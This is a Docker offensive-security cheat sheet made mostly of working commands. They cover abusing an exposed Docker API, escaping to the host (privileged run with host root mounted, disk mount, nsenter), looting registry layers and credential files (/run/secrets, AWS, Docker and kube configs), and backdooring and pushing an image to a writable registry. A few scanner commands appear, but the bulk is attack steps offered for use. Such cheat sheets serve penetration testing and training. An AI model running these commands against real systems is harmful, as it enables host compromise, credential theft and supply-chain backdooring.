Docker Security Testing

# Check if running in Docker
cat /proc/1/cgroup 2>/dev/null | grep -i docker
ls -la /.dockerenv 2>/dev/null

# Check container ID
cat /etc/hostname

# Container capabilities
cat /proc/self/status | grep Cap

# Check for exposed TCP socket
nmap -p 2375,2376 --script docker-version TARGET

# Test unauthenticated access
curl http://TARGET:2375/info
curl http://TARGET:2375/containers/json
curl http://TARGET:2375/images/json

# List all containers
curl -s http://TARGET:2375/containers/json?all=1 | jq

# Check for mounted Docker socket
ls -la /var/run/docker.sock

# If present, we can control Docker daemon
docker ps
docker images

# Escape to host
docker run -it --privileged --pid=host --net=host -v /:/host alpine chroot /host

# Check if privileged (all capabilities)
cat /proc/self/status | grep CapEff
# 0000003fffffffff = privileged (all caps)

# Method 1: Mount host disk
fdisk -l  # Find host disk
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host

# Method 2: nsenter to host
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

# Check sensitive mounts
mount | grep -E 'proc|sys|dev'
ls -la /dev

# /dev/sda - Host disk access
fdisk -l
mount /dev/sda1 /mnt

# Host network namespace
# If --net=host is set, access host network interfaces
ip addr

# Check for exposed registry
curl http://REGISTRY:5000/v2/

# List repositories
curl http://REGISTRY:5000/v2/_catalog

# List tags for image
curl http://REGISTRY:5000/v2/IMAGE_NAME/tags/list

# Get manifest
curl http://REGISTRY:5000/v2/IMAGE_NAME/manifests/latest

# Download layer blob
curl -o layer.tar.gz http://REGISTRY:5000/v2/IMAGE_NAME/blobs/sha256:HASH

# Extract and analyze
tar -xzf layer.tar.gz
grep -r password .
grep -r secret .

# If write access to registry exists

# 1. Pull legitimate image
docker pull registry:5000/app:latest

# 2. Modify with backdoor
docker run -it registry:5000/app:latest /bin/sh
# Add backdoor, then commit
docker commit CONTAINER_ID registry:5000/app:latest

# 3. Push backdoored image
docker push registry:5000/app:latest

# Trivy - Comprehensive vulnerability scanner
trivy image nginx:latest
trivy image --severity HIGH,CRITICAL nginx:latest

# Grype - Anchore vulnerability scanner
grype nginx:latest

# Dive - Analyze image layers for secrets
dive nginx:latest

# From host - enumerate containers
docker ps -a
docker inspect CONTAINER

# Get container filesystem
docker export CONTAINER > container.tar

# Copy files from container
docker cp CONTAINER:/etc/passwd ./passwd

# Execute in running container
docker exec -it CONTAINER /bin/bash

# View logs (may contain secrets)
docker logs CONTAINER

# Environment variables
env

# Docker secrets location
ls -la /run/secrets/
cat /run/secrets/*

# Check for mounted secret files
mount | grep secret

# Common credential locations
cat ~/.aws/credentials
cat ~/.docker/config.json
cat ~/.kube/config

#!/bin/bash
# Quick container escape enumeration

echo '=== Container Detection ==='
cat /proc/1/cgroup 2>/dev/null | grep -q docker && echo '[+] Running in Docker'
ls /.dockerenv 2>/dev/null && echo '[+] .dockerenv exists'

echo ''
echo '=== Privileges ==='
cat /proc/self/status | grep CapEff

echo ''
echo '=== Sensitive Mounts ==='
ls -la /var/run/docker.sock 2>/dev/null && echo '[!] Docker socket mounted!'

echo ''
echo '=== Network ==='
hostname -I
ip route